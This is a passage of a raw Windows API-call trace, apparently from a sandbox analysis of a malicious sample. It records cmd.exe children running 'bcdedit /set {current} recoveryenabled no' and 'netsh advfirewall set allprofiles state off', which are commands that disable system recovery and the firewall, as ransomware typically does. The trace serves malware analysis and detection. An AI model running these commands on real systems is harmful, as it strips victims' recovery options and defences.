_String2="RENAME") returned -16 [0114.116] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0114.116] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0114.116] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0114.116] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0114.116] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0114.116] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0114.116] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0114.116] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0114.116] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0114.117] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0114.117] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0114.117] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0114.117] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0114.117] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0114.117] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0114.117] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0114.117] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0114.117] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0114.117] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0114.117] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0114.117] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0114.117] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0114.117] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0114.117] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0114.117] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0114.117] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0114.118] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0114.118] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0114.118] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0114.118] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0114.118] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0114.118] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0114.118] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0114.118] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0114.118] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0114.118] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0114.118] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0114.119] GetProcessHeap () returned 0x2b0000 [0114.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x218) returned 0x2c9a50 [0114.119] GetProcessHeap () returned 0x2b0000 [0114.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x66) returned 0x2c9c70 [0114.119] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0114.119] GetProcessHeap () returned 0x2b0000 [0114.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x420) returned 0x2b1320 [0114.120] SetErrorMode (uMode=0x0) returned 0x0 [0114.120] SetErrorMode (uMode=0x1) returned 0x0 [0114.120] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2b1330, lpFilePart=0x14ec80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x14ec80*="Desktop") returned 0x25 [0114.120] SetErrorMode (uMode=0x0) returned 0x1 [0114.120] GetProcessHeap () returned 0x2b0000 [0114.120] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2b1320, Size=0x6c) returned 0x2b1320 [0114.120] GetProcessHeap () returned 0x2b0000 [0114.120] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2b1320) returned 0x6c [0114.121] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.121] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.121] GetProcessHeap () returned 0x2b0000 [0114.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x128) returned 0x2c9ce0 [0114.121] GetProcessHeap () returned 0x2b0000 [0114.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x240) returned 0x2c9e10 [0114.295] GetProcessHeap () returned 0x2b0000 [0114.295] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c9e10, Size=0x12a) returned 0x2c9e10 [0114.296] GetProcessHeap () returned 0x2b0000 [0114.296] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2c9e10) returned 0x12a [0114.296] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.296] GetProcessHeap () returned 0x2b0000 [0114.296] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xe8) returned 0x2c9f50 [0114.296] GetProcessHeap () returned 0x2b0000 [0114.296] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c9f50, Size=0x7e) returned 0x2c9f50 [0114.296] GetProcessHeap () returned 0x2b0000 [0114.296] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2c9f50) returned 0x7e [0114.429] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.430] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0xffffffffffffffff [0114.430] GetLastError () returned 0x2 [0114.430] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0xffffffffffffffff [0114.430] GetLastError () returned 0x2 [0114.430] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.431] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0x2c9fe0 [0114.433] GetProcessHeap () returned 0x2b0000 [0114.433] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x28) returned 0x2c46a0 [0114.433] FindClose (in: hFindFile=0x2c9fe0 | out: hFindFile=0x2c9fe0) returned 1 [0114.433] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0xffffffffffffffff [0114.433] GetLastError () returned 0x2 [0114.433] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x14e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e9f0) returned 0x2c9fe0 [0114.434] GetProcessHeap () returned 0x2b0000 [0114.434] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c46a0, Size=0x8) returned 0x2ca040 [0114.434] FindClose (in: hFindFile=0x2c9fe0 | out: hFindFile=0x2c9fe0) returned 1 [0114.434] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.434] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.434] GetConsoleTitleW (in: lpConsoleTitle=0x14ef40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.434] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ecf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14ecb8 | out: lpAttributeList=0x14ecf8, lpSize=0x14ecb8) returned 1 [0114.434] UpdateProcThreadAttribute (in: lpAttributeList=0x14ecf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x14eca8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ecf8, lpPreviousValue=0x0) returned 1 [0114.435] GetStartupInfoW (in: lpStartupInfo=0x14ee10 | out: lpStartupInfo=0x14ee10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0114.435] GetProcessHeap () returned 0x2b0000 [0114.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x20) returned 0x2c46a0 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.435] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.436] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.437] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.438] GetProcessHeap () returned 0x2b0000 [0114.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c46a0 | out: hHeap=0x2b0000) returned 1 [0114.438] GetProcessHeap () returned 0x2b0000 [0114.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x12) returned 0x2c89e0 [0114.438] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.440] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {current} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x14ed30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {current} recoveryenabled no", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14ece0 | out: lpCommandLine="bcdedit /set {current} recoveryenabled no", lpProcessInformation=0x14ece0*(hProcess=0x54, hThread=0x50, dwProcessId=0x7fc, dwThreadId=0x80c)) returned 1 [0115.310] CloseHandle (hObject=0x50) returned 1 [0115.311] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.311] GetProcessHeap () returned 0x2b0000 [0115.311] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc310 | out: hHeap=0x2b0000) returned 1 [0115.311] GetEnvironmentStringsW () returned 0x2cad10* [0115.311] GetProcessHeap () returned 0x2b0000 [0115.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xae8) returned 0x2cb800 [0115.311] FreeEnvironmentStringsW (penv=0x2cad10) returned 1 [0115.311] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0116.809] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x14ec28 | out: lpExitCode=0x14ec28*=0x0) returned 1 [0116.809] CloseHandle (hObject=0x54) returned 1 [0116.809] _vsnwprintf (in: _Buffer=0x14ee98, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ec38 | out: _Buffer="00000000") returned 8 [0116.809] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.809] GetProcessHeap () returned 0x2b0000 [0116.809] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb800 | out: hHeap=0x2b0000) returned 1 [0116.809] GetEnvironmentStringsW () returned 0x2cad10* [0116.810] GetProcessHeap () returned 0x2b0000 [0116.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0e) returned 0x2cb830 [0116.810] FreeEnvironmentStringsW (penv=0x2cad10) returned 1 [0116.810] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.810] GetProcessHeap () returned 0x2b0000 [0116.810] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb830 | out: hHeap=0x2b0000) returned 1 [0116.810] GetEnvironmentStringsW () returned 0x2cad10* [0116.810] GetProcessHeap () returned 0x2b0000 [0116.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xb0e) returned 0x2cb830 [0116.811] FreeEnvironmentStringsW (penv=0x2cad10) returned 1 [0116.811] GetProcessHeap () returned 0x2b0000 [0116.811] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c89e0 | out: hHeap=0x2b0000) returned 1 [0116.811] DeleteProcThreadAttributeList (in: lpAttributeList=0x14ecf8 | out: lpAttributeList=0x14ecf8) [0116.811] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.811] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.812] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.812] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0116.812] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.812] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0116.813] SetConsoleInputExeNameW () returned 0x1 [0116.813] GetConsoleOutputCP () returned 0x1b5 [0116.813] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0116.813] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.814] exit (_Code=0) Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x46b6a000" os_pid = "0x694" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x618" cmd_line = "\"C:\\Windows\\sysnative\\cmd.exe\" /c netsh advfirewall set allprofiles state off" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 12 os_tid = 0x738 [0113.982] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ef790 | out: lpSystemTimeAsFileTime=0x1ef790*(dwLowDateTime=0x2cde21e0, dwHighDateTime=0x1d5f7c9)) [0113.982] GetCurrentProcessId () returned 0x694 [0113.982] GetCurrentThreadId () returned 0x738 [0114.125] GetTickCount () returned 0x114a3fd [0114.125] QueryPerformanceCounter (in: lpPerformanceCount=0x1ef798 | out: lpPerformanceCount=0x1ef798*=22014824420) returned 1 [0114.150] GetModuleHandleW (lpModuleName=0x0) returned 0x4abf0000 [0114.151] __set_app_type (_Type=0x1) [0114.151] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac17810) returned 0x0 [0114.151] __getmainargs (in: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610, _DoWildCard=0, _StartInfo=0x4ac1e0f4 | out: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610) returned 0 [0114.152] GetCurrentThreadId () returned 0x738 [0114.152] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x738) returned 0x3c [0114.152] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.153] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0114.153] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.153] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.153] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef728 | out: phkResult=0x1ef728*=0x0) returned 0x2 [0114.154] VirtualQuery (in: lpAddress=0x1ef710, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef690, dwLength=0x30 | out: lpBuffer=0x1ef690*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.154] GetConsoleOutputCP () returned 0x1b5 [0114.154] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.155] SetConsoleCtrlHandler (HandlerRoutine=0x4ac13184, Add=1) returned 1 [0114.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.155] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0114.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.155] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0114.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.156] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.157] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0114.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.157] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0114.157] GetEnvironmentStringsW () returned 0x288b40* [0114.157] GetProcessHeap () returned 0x270000 [0114.157] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa7c) returned 0x2895d0 [0114.158] FreeEnvironmentStringsW (penv=0x288b40) returned 1 [0114.158] GetProcessHeap () returned 0x270000 [0114.158] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x8) returned 0x2889c0 [0114.158] GetEnvironmentStringsW () returned 0x288b40* [0114.158] GetProcessHeap () returned 0x270000 [0114.158] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa7c) returned 0x28a060 [0114.159] FreeEnvironmentStringsW (penv=0x288b40) returned 1 [0114.159] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee5e8 | out: phkResult=0x1ee5e8*=0x44) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x18, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x0, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.159] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.159] RegCloseKey (hKey=0x44) returned 0x0 [0114.159] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee5e8 | out: phkResult=0x1ee5e8*=0x44) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x40, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x1, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x0, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: lpType=0x1ee5e0*=0x4, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x4) returned 0x0 [0114.160] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee5e0, lpData=0x1ee600, lpcbData=0x1ee5e4*=0x1000 | out: 